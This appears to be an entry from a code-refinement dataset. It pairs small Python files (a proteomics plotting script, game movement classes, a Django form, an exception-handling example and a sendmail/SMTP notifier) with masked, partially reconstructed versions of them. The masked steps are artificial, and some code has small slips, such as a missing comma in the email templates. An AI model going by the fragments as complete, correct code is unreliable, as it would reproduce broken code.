"step-3": "<mask token>\nfile_list = ['Quantification_comet_fdr.csv', 'Quantification_crux_fdr.csv',\n 'Quantification_msfg_fdr.csv', 'Quantification_msfg_percolator.csv']\nfile_titles = ['Comet', 'Crux', 'MSGFPlus', 'MSGFPlus + Percolator']\nprotein_list = []\npeptides_list = []\nfor file_name in file_list:\n proteins = 0\n peptides = 0\n for line_index, line in enumerate(open(file_name, 'r')):\n if line_index > 3:\n proteins += 1\n peptides += int(line.split('\\t')[3])\n protein_list.append(proteins)\n peptides_list.append(peptides)\n print(f'{file_name} is done')\nplt.bar(file_titles, protein_list, color=['black', 'red', 'green', 'blue',\n 'cyan'], edgecolor='blue')\nplt.title('Comparing proteins found')\nplt.ylabel('Number of proteins matched')\nplt.tight_layout()\nplt.savefig('search_engines_proteins.png')\nplt.bar(file_titles, peptides_list, color=['black', 'red', 'green', 'blue',\n 'cyan'], edgecolor='blue')\nplt.title('Comparing amount of peptides matched')\nplt.ylabel('Total amount of peptides matched')\nplt.tight_layout()\nplt.savefig('search_engines_peptides.png')\n",
"step-4": "import matplotlib.pyplot as plt\nfile_list = ['Quantification_comet_fdr.csv', 'Quantification_crux_fdr.csv',\n 'Quantification_msfg_fdr.csv', 'Quantification_msfg_percolator.csv']\nfile_titles = ['Comet', 'Crux', 'MSGFPlus', 'MSGFPlus + Percolator']\nprotein_list = []\npeptides_list = []\nfor file_name in file_list:\n proteins = 0\n peptides = 0\n for line_index, line in enumerate(open(file_name, 'r')):\n if line_index > 3:\n proteins += 1\n peptides += int(line.split('\\t')[3])\n protein_list.append(proteins)\n peptides_list.append(peptides)\n print(f'{file_name} is done')\nplt.bar(file_titles, protein_list, color=['black', 'red', 'green', 'blue',\n 'cyan'], edgecolor='blue')\nplt.title('Comparing proteins found')\nplt.ylabel('Number of proteins matched')\nplt.tight_layout()\nplt.savefig('search_engines_proteins.png')\nplt.bar(file_titles, peptides_list, color=['black', 'red', 'green', 'blue',\n 'cyan'], edgecolor='blue')\nplt.title('Comparing amount of peptides matched')\nplt.ylabel('Total amount of peptides matched')\nplt.tight_layout()\nplt.savefig('search_engines_peptides.png')\n",
"step-5": "import matplotlib.pyplot as plt\n\nfile_list = [\"Quantification_comet_fdr.csv\",\n \"Quantification_crux_fdr.csv\",\n \"Quantification_msfg_fdr.csv\",\n \"Quantification_msfg_percolator.csv\"]\nfile_titles = [\"Comet\",\n \"Crux\",\n \"MSGFPlus\",\n \"MSGFPlus + Percolator\"]\n\nprotein_list = []\npeptides_list = []\n\nfor file_name in file_list:\n proteins = 0 # n of proteins\n peptides = 0\n for line_index, line in enumerate(open(file_name, 'r')):\n if line_index > 3: # Proteins are listed after row 4\n proteins += 1\n peptides += int(line.split('\\t')[3]) # n_peptides is in column 4\n protein_list.append(proteins)\n peptides_list.append(peptides)\n print(f\"{file_name} is done\")\n\nplt.bar(file_titles,\n protein_list,\n color=['black', 'red', 'green', 'blue', 'cyan'],\n edgecolor='blue')\nplt.title(\"Comparing proteins found\")\nplt.ylabel(\"Number of proteins matched\")\nplt.tight_layout() # Fixes cut off labels\nplt.savefig(\"search_engines_proteins.png\")\n\nplt.bar(file_titles,\n peptides_list,\n color=['black', 'red', 'green', 'blue', 'cyan'],\n edgecolor='blue')\nplt.title(\"Comparing amount of peptides matched\")\nplt.ylabel(\"Total amount of peptides matched\")\nplt.tight_layout() # Fixes cut off labels\nplt.savefig(\"search_engines_peptides.png\")\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from __future__ import annotations
from abc import ABC, abstractmethod
class AbstractMoviment(ABC):
@abstractmethod
    def move(self, coordinates, speed, startcoordinate, dt):
        # Concrete movements update and return the (coordinates, speed) tuple.
        pass
class Mov_LinearFall(AbstractMoviment):
def move(self, coordinates, speed, lastcoordinate, dt):
coordinates[1] = round(coordinates[1] + speed * dt)
return coordinates, speed
class Mov_ZigZag(AbstractMoviment):
direct = True
def move(self, coordinates, speed, startcoordinate, dt):
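        # Fall vertically at `speed` while sweeping left/right, reversing
        # direction whenever the ship leaves the zigzag band around its spawn x.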
        ZigZageamento = 100  # maximum horizontal deviation of the ship
coordinates[1] = round(coordinates[1] + speed * dt)
if (startcoordinate[0] + ZigZageamento >= coordinates[0]) and (
                self.direct):  # if it was on the left, move right
coordinates[0] = round(coordinates[0] + speed * dt)
elif (startcoordinate[0] - ZigZageamento <= coordinates[0]) and (not self.direct):
coordinates[0] = round(coordinates[0] - speed * dt)
else:
self.direct = not self.direct
return coordinates, speed
class Mov_DiagRight(AbstractMoviment):
def __init__(self, x_speed):
        self.x_speed = x_speed  # sine of the angle; .17 works well
def move(self, coordinates, speed, startcoordinate, dt):
        ZigZageamento = 100  # maximum horizontal deviation of the ship (unused here)
coordinates[1] = round(coordinates[1] + speed * dt)
# sin(10 degrees) = .17
coordinates[0] = round(coordinates[0] + speed*self.x_speed * dt)
return coordinates, speed
class Mov_DiagLeft(AbstractMoviment):
def __init__(self, x_speed):
        self.x_speed = x_speed  # sine of the angle; .17 works well
def move(self, coordinates, speed, startcoordinate, dt):
        ZigZageamento = 100  # maximum horizontal deviation of the ship (unused here)
coordinates[1] = round(coordinates[1] + speed * dt)
# sin(10 degrees) = .17
coordinates[0] = round(coordinates[0] - speed*self.x_speed * dt)
return coordinates, speed
|
normal
|
{
"blob_id": "57935b560108ef0db59de9eee59aa0c908c58b8f",
"index": 2348,
"step-1": "<mask token>\n\n\nclass Mov_ZigZag(AbstractMoviment):\n <mask token>\n\n def move(self, coordinates, speed, startcoordinate, dt):\n ZigZageamento = 100\n coordinates[1] = round(coordinates[1] + speed * dt)\n if startcoordinate[0] + ZigZageamento >= coordinates[0\n ] and self.direct:\n coordinates[0] = round(coordinates[0] + speed * dt)\n elif startcoordinate[0] - ZigZageamento <= coordinates[0\n ] and not self.direct:\n coordinates[0] = round(coordinates[0] - speed * dt)\n else:\n self.direct = not self.direct\n return coordinates, speed\n\n\nclass Mov_DiagRight(AbstractMoviment):\n\n def __init__(self, x_speed):\n self.x_speed = x_speed\n\n def move(self, coordinates, speed, startcoordinate, dt):\n ZigZageamento = 100\n coordinates[1] = round(coordinates[1] + speed * dt)\n coordinates[0] = round(coordinates[0] + speed * self.x_speed * dt)\n return coordinates, speed\n\n\nclass Mov_DiagLeft(AbstractMoviment):\n\n def __init__(self, x_speed):\n self.x_speed = x_speed\n\n def move(self, coordinates, speed, startcoordinate, dt):\n ZigZageamento = 100\n coordinates[1] = round(coordinates[1] + speed * dt)\n coordinates[0] = round(coordinates[0] - speed * self.x_speed * dt)\n return coordinates, speed\n",
"step-2": "<mask token>\n\n\nclass Mov_ZigZag(AbstractMoviment):\n direct = True\n\n def move(self, coordinates, speed, startcoordinate, dt):\n ZigZageamento = 100\n coordinates[1] = round(coordinates[1] + speed * dt)\n if startcoordinate[0] + ZigZageamento >= coordinates[0\n ] and self.direct:\n coordinates[0] = round(coordinates[0] + speed * dt)\n elif startcoordinate[0] - ZigZageamento <= coordinates[0\n ] and not self.direct:\n coordinates[0] = round(coordinates[0] - speed * dt)\n else:\n self.direct = not self.direct\n return coordinates, speed\n\n\nclass Mov_DiagRight(AbstractMoviment):\n\n def __init__(self, x_speed):\n self.x_speed = x_speed\n\n def move(self, coordinates, speed, startcoordinate, dt):\n ZigZageamento = 100\n coordinates[1] = round(coordinates[1] + speed * dt)\n coordinates[0] = round(coordinates[0] + speed * self.x_speed * dt)\n return coordinates, speed\n\n\nclass Mov_DiagLeft(AbstractMoviment):\n\n def __init__(self, x_speed):\n self.x_speed = x_speed\n\n def move(self, coordinates, speed, startcoordinate, dt):\n ZigZageamento = 100\n coordinates[1] = round(coordinates[1] + speed * dt)\n coordinates[0] = round(coordinates[0] - speed * self.x_speed * dt)\n return coordinates, speed\n",
"step-3": "<mask token>\n\n\nclass Mov_LinearFall(AbstractMoviment):\n\n def move(self, coordinates, speed, lastcoordinate, dt):\n coordinates[1] = round(coordinates[1] + speed * dt)\n return coordinates, speed\n\n\nclass Mov_ZigZag(AbstractMoviment):\n direct = True\n\n def move(self, coordinates, speed, startcoordinate, dt):\n ZigZageamento = 100\n coordinates[1] = round(coordinates[1] + speed * dt)\n if startcoordinate[0] + ZigZageamento >= coordinates[0\n ] and self.direct:\n coordinates[0] = round(coordinates[0] + speed * dt)\n elif startcoordinate[0] - ZigZageamento <= coordinates[0\n ] and not self.direct:\n coordinates[0] = round(coordinates[0] - speed * dt)\n else:\n self.direct = not self.direct\n return coordinates, speed\n\n\nclass Mov_DiagRight(AbstractMoviment):\n\n def __init__(self, x_speed):\n self.x_speed = x_speed\n\n def move(self, coordinates, speed, startcoordinate, dt):\n ZigZageamento = 100\n coordinates[1] = round(coordinates[1] + speed * dt)\n coordinates[0] = round(coordinates[0] + speed * self.x_speed * dt)\n return coordinates, speed\n\n\nclass Mov_DiagLeft(AbstractMoviment):\n\n def __init__(self, x_speed):\n self.x_speed = x_speed\n\n def move(self, coordinates, speed, startcoordinate, dt):\n ZigZageamento = 100\n coordinates[1] = round(coordinates[1] + speed * dt)\n coordinates[0] = round(coordinates[0] - speed * self.x_speed * dt)\n return coordinates, speed\n",
"step-4": "<mask token>\n\n\nclass AbstractMoviment(ABC):\n <mask token>\n\n\nclass Mov_LinearFall(AbstractMoviment):\n\n def move(self, coordinates, speed, lastcoordinate, dt):\n coordinates[1] = round(coordinates[1] + speed * dt)\n return coordinates, speed\n\n\nclass Mov_ZigZag(AbstractMoviment):\n direct = True\n\n def move(self, coordinates, speed, startcoordinate, dt):\n ZigZageamento = 100\n coordinates[1] = round(coordinates[1] + speed * dt)\n if startcoordinate[0] + ZigZageamento >= coordinates[0\n ] and self.direct:\n coordinates[0] = round(coordinates[0] + speed * dt)\n elif startcoordinate[0] - ZigZageamento <= coordinates[0\n ] and not self.direct:\n coordinates[0] = round(coordinates[0] - speed * dt)\n else:\n self.direct = not self.direct\n return coordinates, speed\n\n\nclass Mov_DiagRight(AbstractMoviment):\n\n def __init__(self, x_speed):\n self.x_speed = x_speed\n\n def move(self, coordinates, speed, startcoordinate, dt):\n ZigZageamento = 100\n coordinates[1] = round(coordinates[1] + speed * dt)\n coordinates[0] = round(coordinates[0] + speed * self.x_speed * dt)\n return coordinates, speed\n\n\nclass Mov_DiagLeft(AbstractMoviment):\n\n def __init__(self, x_speed):\n self.x_speed = x_speed\n\n def move(self, coordinates, speed, startcoordinate, dt):\n ZigZageamento = 100\n coordinates[1] = round(coordinates[1] + speed * dt)\n coordinates[0] = round(coordinates[0] - speed * self.x_speed * dt)\n return coordinates, speed\n",
"step-5": "from __future__ import annotations\nfrom abc import ABC, abstractmethod\n\n\nclass AbstractMoviment(ABC):\n @abstractmethod\n def move(self, dt) -> None:\n pass\n\n\nclass Mov_LinearFall(AbstractMoviment):\n def move(self, coordinates, speed, lastcoordinate, dt):\n coordinates[1] = round(coordinates[1] + speed * dt)\n return coordinates, speed\n\n\nclass Mov_ZigZag(AbstractMoviment):\n direct = True\n\n def move(self, coordinates, speed, startcoordinate, dt):\n ZigZageamento = 100 # variacao max da nave\n coordinates[1] = round(coordinates[1] + speed * dt)\n\n if (startcoordinate[0] + ZigZageamento >= coordinates[0]) and (\n self.direct): # se ele tava na esquerda vai pra direita\n coordinates[0] = round(coordinates[0] + speed * dt)\n\n elif (startcoordinate[0] - ZigZageamento <= coordinates[0]) and (not self.direct):\n coordinates[0] = round(coordinates[0] - speed * dt)\n\n else:\n self.direct = not self.direct\n\n return coordinates, speed\n\nclass Mov_DiagRight(AbstractMoviment):\n def __init__(self, x_speed):\n self.x_speed = x_speed # seno do angulo, .17 é bom\n def move(self, coordinates, speed, startcoordinate, dt):\n ZigZageamento = 100 # variacao max da nave\n coordinates[1] = round(coordinates[1] + speed * dt)\n # sin(10 degrees) = .17\n coordinates[0] = round(coordinates[0] + speed*self.x_speed * dt)\n\n return coordinates, speed\n\nclass Mov_DiagLeft(AbstractMoviment):\n def __init__(self, x_speed):\n self.x_speed = x_speed # seno do angulo, .17 é bom\n def move(self, coordinates, speed, startcoordinate, dt):\n ZigZageamento = 100 # variacao max da nave\n coordinates[1] = round(coordinates[1] + speed * dt)\n # sin(10 degrees) = .17\n coordinates[0] = round(coordinates[0] - speed*self.x_speed * dt)\n\n return coordinates, speed",
"step-ids": [
8,
9,
11,
12,
15
]
}
|
[
8,
9,
11,
12,
15
] |
from django import forms
from django.forms import ModelForm
from .models import Noticia
class NoticiaForm(ModelForm):
class Meta:
model = Noticia
fields = ['idNoticia', 'resumen', 'titulo', 'categoria']
|
normal
|
{
"blob_id": "e7a283e0e0e16e9adb415b26d724b2ee84c4f4f8",
"index": 1547,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass NoticiaForm(ModelForm):\n\n\n class Meta:\n model = Noticia\n fields = ['idNoticia', 'resumen', 'titulo', 'categoria']\n",
"step-3": "from django import forms\nfrom django.forms import ModelForm\nfrom .models import Noticia\n\n\nclass NoticiaForm(ModelForm):\n\n\n class Meta:\n model = Noticia\n fields = ['idNoticia', 'resumen', 'titulo', 'categoria']\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
try:
print(int(s) + 1)
print(int(s) / 1)
except ValueError as ve:
print('ValueError occurs!!!', ve)
except ZeroDivisionError as e:
    print('ZeroDivisionError occurs!!!', e)
except:
print('Error occurs!!!')
else:
print('elseeeeeeeeeeeeeee')
finally:
print('ABCDEFG')
<|reserved_special_token_1|>
s = '123'
try:
print(int(s) + 1)
print(int(s) / 1)
except ValueError as ve:
print('ValueError occurs!!!', ve)
except ZeroDivisionError as e:
    print('ZeroDivisionError occurs!!!', e)
except:
print('Error occurs!!!')
else:
print('elseeeeeeeeeeeeeee')
finally:
print('ABCDEFG')
<|reserved_special_token_1|>
#-*- coding: utf-8 -*-
s = "123"
try:
print(int(s) + 1)
print(int(s) / 1)
except ValueError as ve:
print("ValueError occurs!!!", ve)
except ZeroDivisionError as e:
print("ValueError occurs!!!", e)
except :
print("Error occurs!!!")
else:
print("elseeeeeeeeeeeeeee")
finally:
print("ABCDEFG")
# try:
# # code that may raise an exception
# except:
# # statements that handle the exception
# except:
# pass  # just swallow it?!
# else:
# # runs only if no exception occurred
# finally:
# # runs whether or not an exception occurred
|
flexible
|
{
"blob_id": "1bf79319613ca1454f3a9ed21068bd899616395c",
"index": 624,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ntry:\n print(int(s) + 1)\n print(int(s) / 1)\nexcept ValueError as ve:\n print('ValueError occurs!!!', ve)\nexcept ZeroDivisionError as e:\n print('ValueError occurs!!!', e)\nexcept:\n print('Error occurs!!!')\nelse:\n print('elseeeeeeeeeeeeeee')\nfinally:\n print('ABCDEFG')\n",
"step-3": "s = '123'\ntry:\n print(int(s) + 1)\n print(int(s) / 1)\nexcept ValueError as ve:\n print('ValueError occurs!!!', ve)\nexcept ZeroDivisionError as e:\n print('ValueError occurs!!!', e)\nexcept:\n print('Error occurs!!!')\nelse:\n print('elseeeeeeeeeeeeeee')\nfinally:\n print('ABCDEFG')\n",
"step-4": "#-*- coding: utf-8 -*-\ns = \"123\"\n\ntry:\n print(int(s) + 1)\n print(int(s) / 1)\n\nexcept ValueError as ve:\n print(\"ValueError occurs!!!\", ve)\n\nexcept ZeroDivisionError as e:\n print(\"ValueError occurs!!!\", e)\n\nexcept :\n print(\"Error occurs!!!\")\n\nelse:\n print(\"elseeeeeeeeeeeeeee\")\n\nfinally:\n print(\"ABCDEFG\")\n\n# try:\n# # 예외 발생 가능 코드들\n# except:\n# # 예외시 처리될 구문\n# except:\n# pass #씹겠다?!\n# else:\n# #예외가 없을 경우 실행되는 부분\n\n# finally:\n# #예외가 있던 없던 실행되는 부분",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import smtplib
import subprocess
import time
class NotifyError(Exception):
def __init__(self, message):
self.message = message
class Notification(object):
def __init__(self, config, dry_run):
self.dry_run = dry_run
self.notifications = {}
def submit(self, recipient, message):
if recipient not in self.notifications:
self.notifications[recipient] = []
self.notifications[recipient].append(message)
def notify_all(self):
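        # Flush every recipient's queued messages as one joined notification,
        # pausing between recipients to avoid hammering the mail server.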
for recip in self.notifications:
if len(self.notifications[recip]) > 0:
self.notify(recip, '\r\n\r\n-------------------\r\n\r\n'.join(self.notifications[recip]))
time.sleep(5)
self.notifications[recip] = []
def notify(self, recipient, message):
raise NotImplementedError('Need to subclass Notification')
def connect(self):
raise NotImplementedError('Need to subclass Notification')
def close(self):
raise NotImplementedError('Need to subclass Notification')
class SendMail(Notification):
def __init__(self, config, dry_run):
super().__init__(config, dry_run)
self.address = config.sendmail.address
self.contact_info = config.sendmail.contact_info
self.message_template = '\r\n'.join(['From: '+self.address,
'To: {}',
'Subject: ['+config.name+'] Notifications',
'',
'Greetings Human {},',
'',
                                             '{}',
'',
'',
'Beep boop,',
config.name + ' Bot'])
def notify(self, recipient, message):
# -i flag: do NOT treat bare dot as EOF
        cmd = ['/usr/sbin/sendmail', '-i', '-f', self.address, self.contact_info[recipient]['address']]
msg = self.message_template.format(self.contact_info[recipient]['address'], self.contact_info[recipient]['name'], message)
proc = subprocess.Popen(cmd, shell=False,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = proc.communicate(input=msg.encode('utf-8'))
#TODO handle errors
#print(f"ret: {proc.returncode}")
#print("stdout:" + str(out))
#print("stderr:" + str(err))
def connect(self):
pass
def close(self):
pass
class SMTP(Notification):
def __init__(self, config, dry_run):
super().__init__(config, dry_run)
self.hostname = config.smtp.hostname
self.username = config.smtp.username
self.passwd = config.smtp.passwd
self.address = config.smtp.address
self.contact_info = config.smtp.contact_info
self.connected = False
self.message_template = '\r\n'.join(['From: '+self.address,
'To: {}',
'Subject: ['+config.name+'] Notifications',
'',
'Greetings Human {},',
'',
                                             '{}',
'',
'',
'Beep boop,',
config.name + ' Bot'])
#TODO deal with smtplib exceptions
def connect(self):
self.server = smtplib.SMTP(self.hostname)
self.server.ehlo()
self.server.starttls()
self.server.login(self.username, self.passwd)
self.connected = True
#TODO implement saving messages to disk with timestamp if send fails
#TODO deal with smtplib exceptions
def notify(self, recipient, message):
if not self.connected:
raise NotifyError('Not connected to SMTP server; cannot send notifications')
self.server.sendmail(self.address,
self.contact_info[recipient]['address'],
self.message_template.format(self.contact_info[recipient]['address'], self.contact_info[recipient]['name'], message)
)
#TODO deal with smtplib exceptions
def close(self):
if self.connected:
self.server.quit()
self.connected = False
|
normal
|
{
"blob_id": "01849a6bf5ce5eb75c549af28312f61711ad2494",
"index": 4425,
"step-1": "<mask token>\n\n\nclass Notification(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass SendMail(Notification):\n\n def __init__(self, config, dry_run):\n super().__init__(config, dry_run)\n self.address = config.sendmail.address\n self.contact_info = config.sendmail.contact_info\n self.message_template = '\\r\\n'.join(['From: ' + self.address,\n 'To: {}', 'Subject: [' + config.name + '] Notifications', '',\n 'Greetings Human {},', '', '{}', '', 'Beep boop,', config.name +\n ' Bot'])\n\n def notify(self, recipient, message):\n cmd = ['/usr/sbin/sendmail', f'-f {self.address}', self.\n contact_info[recipient]['address']]\n msg = self.message_template.format(self.contact_info[recipient][\n 'address'], self.contact_info[recipient]['name'], message)\n proc = subprocess.Popen(cmd, shell=False, stdin=subprocess.PIPE,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out, err = proc.communicate(input=msg.encode('utf-8'))\n\n def connect(self):\n pass\n\n def close(self):\n pass\n\n\nclass SMTP(Notification):\n\n def __init__(self, config, dry_run):\n super().__init__(config, dry_run)\n self.hostname = config.smtp.hostname\n self.username = config.smtp.username\n self.passwd = config.smtp.passwd\n self.address = config.smtp.address\n self.contact_info = config.smtp.contact_info\n self.connected = False\n self.message_template = '\\r\\n'.join(['From: ' + self.address,\n 'To: {}', 'Subject: [' + config.name + '] Notifications', '',\n 'Greetings Human {},', '', '{}', '', 'Beep boop,', config.name +\n ' Bot'])\n\n def connect(self):\n self.server = smtplib.SMTP(self.hostname)\n self.server.ehlo()\n self.server.starttls()\n self.server.login(self.username, self.passwd)\n self.connected = True\n\n def notify(self, recipient, message):\n if not self.connected:\n raise NotifyError(\n 'Not connected to SMTP server; cannot send notifications')\n self.server.sendmail(self.address, self.contact_info[recipient][\n 'address'], self.message_template.format(self.contact_info[\n recipient]['address'], self.contact_info[recipient]['name'],\n message))\n\n def close(self):\n if self.connected:\n self.server.quit()\n self.connected = False\n",
"step-2": "<mask token>\n\n\nclass Notification(object):\n\n def __init__(self, config, dry_run):\n self.dry_run = dry_run\n self.notifications = {}\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass SendMail(Notification):\n\n def __init__(self, config, dry_run):\n super().__init__(config, dry_run)\n self.address = config.sendmail.address\n self.contact_info = config.sendmail.contact_info\n self.message_template = '\\r\\n'.join(['From: ' + self.address,\n 'To: {}', 'Subject: [' + config.name + '] Notifications', '',\n 'Greetings Human {},', '', '{}', '', 'Beep boop,', config.name +\n ' Bot'])\n\n def notify(self, recipient, message):\n cmd = ['/usr/sbin/sendmail', f'-f {self.address}', self.\n contact_info[recipient]['address']]\n msg = self.message_template.format(self.contact_info[recipient][\n 'address'], self.contact_info[recipient]['name'], message)\n proc = subprocess.Popen(cmd, shell=False, stdin=subprocess.PIPE,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out, err = proc.communicate(input=msg.encode('utf-8'))\n\n def connect(self):\n pass\n\n def close(self):\n pass\n\n\nclass SMTP(Notification):\n\n def __init__(self, config, dry_run):\n super().__init__(config, dry_run)\n self.hostname = config.smtp.hostname\n self.username = config.smtp.username\n self.passwd = config.smtp.passwd\n self.address = config.smtp.address\n self.contact_info = config.smtp.contact_info\n self.connected = False\n self.message_template = '\\r\\n'.join(['From: ' + self.address,\n 'To: {}', 'Subject: [' + config.name + '] Notifications', '',\n 'Greetings Human {},', '', '{}', '', 'Beep boop,', config.name +\n ' Bot'])\n\n def connect(self):\n self.server = smtplib.SMTP(self.hostname)\n self.server.ehlo()\n self.server.starttls()\n self.server.login(self.username, self.passwd)\n self.connected = True\n\n def notify(self, recipient, message):\n if not self.connected:\n raise NotifyError(\n 'Not connected to SMTP server; cannot send notifications')\n self.server.sendmail(self.address, self.contact_info[recipient][\n 'address'], self.message_template.format(self.contact_info[\n recipient]['address'], self.contact_info[recipient]['name'],\n message))\n\n def close(self):\n if self.connected:\n self.server.quit()\n self.connected = False\n",
"step-3": "<mask token>\n\n\nclass Notification(object):\n\n def __init__(self, config, dry_run):\n self.dry_run = dry_run\n self.notifications = {}\n <mask token>\n <mask token>\n\n def notify(self, recipient, message):\n raise NotImplementedError('Need to subclass Notification')\n\n def connect(self):\n raise NotImplementedError('Need to subclass Notification')\n\n def close(self):\n raise NotImplementedError('Need to subclass Notification')\n\n\nclass SendMail(Notification):\n\n def __init__(self, config, dry_run):\n super().__init__(config, dry_run)\n self.address = config.sendmail.address\n self.contact_info = config.sendmail.contact_info\n self.message_template = '\\r\\n'.join(['From: ' + self.address,\n 'To: {}', 'Subject: [' + config.name + '] Notifications', '',\n 'Greetings Human {},', '', '{}', '', 'Beep boop,', config.name +\n ' Bot'])\n\n def notify(self, recipient, message):\n cmd = ['/usr/sbin/sendmail', f'-f {self.address}', self.\n contact_info[recipient]['address']]\n msg = self.message_template.format(self.contact_info[recipient][\n 'address'], self.contact_info[recipient]['name'], message)\n proc = subprocess.Popen(cmd, shell=False, stdin=subprocess.PIPE,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out, err = proc.communicate(input=msg.encode('utf-8'))\n\n def connect(self):\n pass\n\n def close(self):\n pass\n\n\nclass SMTP(Notification):\n\n def __init__(self, config, dry_run):\n super().__init__(config, dry_run)\n self.hostname = config.smtp.hostname\n self.username = config.smtp.username\n self.passwd = config.smtp.passwd\n self.address = config.smtp.address\n self.contact_info = config.smtp.contact_info\n self.connected = False\n self.message_template = '\\r\\n'.join(['From: ' + self.address,\n 'To: {}', 'Subject: [' + config.name + '] Notifications', '',\n 'Greetings Human {},', '', '{}', '', 'Beep boop,', config.name +\n ' Bot'])\n\n def connect(self):\n self.server = smtplib.SMTP(self.hostname)\n self.server.ehlo()\n self.server.starttls()\n self.server.login(self.username, self.passwd)\n self.connected = True\n\n def notify(self, recipient, message):\n if not self.connected:\n raise NotifyError(\n 'Not connected to SMTP server; cannot send notifications')\n self.server.sendmail(self.address, self.contact_info[recipient][\n 'address'], self.message_template.format(self.contact_info[\n recipient]['address'], self.contact_info[recipient]['name'],\n message))\n\n def close(self):\n if self.connected:\n self.server.quit()\n self.connected = False\n",
"step-4": "import smtplib\nimport subprocess\nimport time\n\n\nclass NotifyError(Exception):\n\n def __init__(self, message):\n self.message = message\n\n\nclass Notification(object):\n\n def __init__(self, config, dry_run):\n self.dry_run = dry_run\n self.notifications = {}\n\n def submit(self, recipient, message):\n if recipient not in self.notifications:\n self.notifications[recipient] = []\n self.notifications[recipient].append(message)\n\n def notify_all(self):\n for recip in self.notifications:\n if len(self.notifications[recip]) > 0:\n self.notify(recip, '\\r\\n\\r\\n-------------------\\r\\n\\r\\n'.\n join(self.notifications[recip]))\n time.sleep(5)\n self.notifications[recip] = []\n\n def notify(self, recipient, message):\n raise NotImplementedError('Need to subclass Notification')\n\n def connect(self):\n raise NotImplementedError('Need to subclass Notification')\n\n def close(self):\n raise NotImplementedError('Need to subclass Notification')\n\n\nclass SendMail(Notification):\n\n def __init__(self, config, dry_run):\n super().__init__(config, dry_run)\n self.address = config.sendmail.address\n self.contact_info = config.sendmail.contact_info\n self.message_template = '\\r\\n'.join(['From: ' + self.address,\n 'To: {}', 'Subject: [' + config.name + '] Notifications', '',\n 'Greetings Human {},', '', '{}', '', 'Beep boop,', config.name +\n ' Bot'])\n\n def notify(self, recipient, message):\n cmd = ['/usr/sbin/sendmail', f'-f {self.address}', self.\n contact_info[recipient]['address']]\n msg = self.message_template.format(self.contact_info[recipient][\n 'address'], self.contact_info[recipient]['name'], message)\n proc = subprocess.Popen(cmd, shell=False, stdin=subprocess.PIPE,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out, err = proc.communicate(input=msg.encode('utf-8'))\n\n def connect(self):\n pass\n\n def close(self):\n pass\n\n\nclass SMTP(Notification):\n\n def __init__(self, config, dry_run):\n super().__init__(config, dry_run)\n self.hostname = config.smtp.hostname\n self.username = config.smtp.username\n self.passwd = config.smtp.passwd\n self.address = config.smtp.address\n self.contact_info = config.smtp.contact_info\n self.connected = False\n self.message_template = '\\r\\n'.join(['From: ' + self.address,\n 'To: {}', 'Subject: [' + config.name + '] Notifications', '',\n 'Greetings Human {},', '', '{}', '', 'Beep boop,', config.name +\n ' Bot'])\n\n def connect(self):\n self.server = smtplib.SMTP(self.hostname)\n self.server.ehlo()\n self.server.starttls()\n self.server.login(self.username, self.passwd)\n self.connected = True\n\n def notify(self, recipient, message):\n if not self.connected:\n raise NotifyError(\n 'Not connected to SMTP server; cannot send notifications')\n self.server.sendmail(self.address, self.contact_info[recipient][\n 'address'], self.message_template.format(self.contact_info[\n recipient]['address'], self.contact_info[recipient]['name'],\n message))\n\n def close(self):\n if self.connected:\n self.server.quit()\n self.connected = False\n",
"step-5": "import smtplib\nimport subprocess\nimport time\n\nclass NotifyError(Exception):\n def __init__(self, message):\n self.message = message\n\nclass Notification(object):\n def __init__(self, config, dry_run):\n self.dry_run = dry_run\n self.notifications = {}\n\n def submit(self, recipient, message):\n if recipient not in self.notifications:\n self.notifications[recipient] = []\n self.notifications[recipient].append(message)\n\n def notify_all(self):\n for recip in self.notifications:\n if len(self.notifications[recip]) > 0:\n self.notify(recip, '\\r\\n\\r\\n-------------------\\r\\n\\r\\n'.join(self.notifications[recip]))\n time.sleep(5)\n self.notifications[recip] = []\n\n def notify(self, recipient, message):\n raise NotImplementedError('Need to subclass Notification')\n\n def connect(self):\n raise NotImplementedError('Need to subclass Notification')\n \n def close(self):\n raise NotImplementedError('Need to subclass Notification')\n\n\nclass SendMail(Notification):\n def __init__(self, config, dry_run):\n super().__init__(config, dry_run)\n self.address = config.sendmail.address\n self.contact_info = config.sendmail.contact_info\n self.message_template = '\\r\\n'.join(['From: '+self.address,\n 'To: {}',\n 'Subject: ['+config.name+'] Notifications',\n '',\n 'Greetings Human {},',\n '',\n '{}'\n '',\n '',\n 'Beep boop,',\n config.name + ' Bot'])\n\n def notify(self, recipient, message):\n # -i flag: do NOT treat bare dot as EOF\n cmd = ['/usr/sbin/sendmail', f'-f {self.address}', self.contact_info[recipient]['address']]\n msg = self.message_template.format(self.contact_info[recipient]['address'], self.contact_info[recipient]['name'], message)\n proc = subprocess.Popen(cmd, shell=False,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n out, err = proc.communicate(input=msg.encode('utf-8'))\n #TODO handle errors\n #print(f\"ret: {proc.returncode}\")\n #print(\"stdout:\" + str(out))\n #print(\"stderr:\" + str(err))\n\n def connect(self):\n pass\n\n def close(self):\n pass\n\nclass SMTP(Notification):\n def __init__(self, config, dry_run):\n super().__init__(config, dry_run)\n self.hostname = config.smtp.hostname\n self.username = config.smtp.username\n self.passwd = config.smtp.passwd\n self.address = config.smtp.address\n self.contact_info = config.smtp.contact_info\n self.connected = False\n self.message_template = '\\r\\n'.join(['From: '+self.address,\n 'To: {}',\n 'Subject: ['+config.name+'] Notifications',\n '',\n 'Greetings Human {},',\n '',\n '{}'\n '',\n '',\n 'Beep boop,',\n config.name + 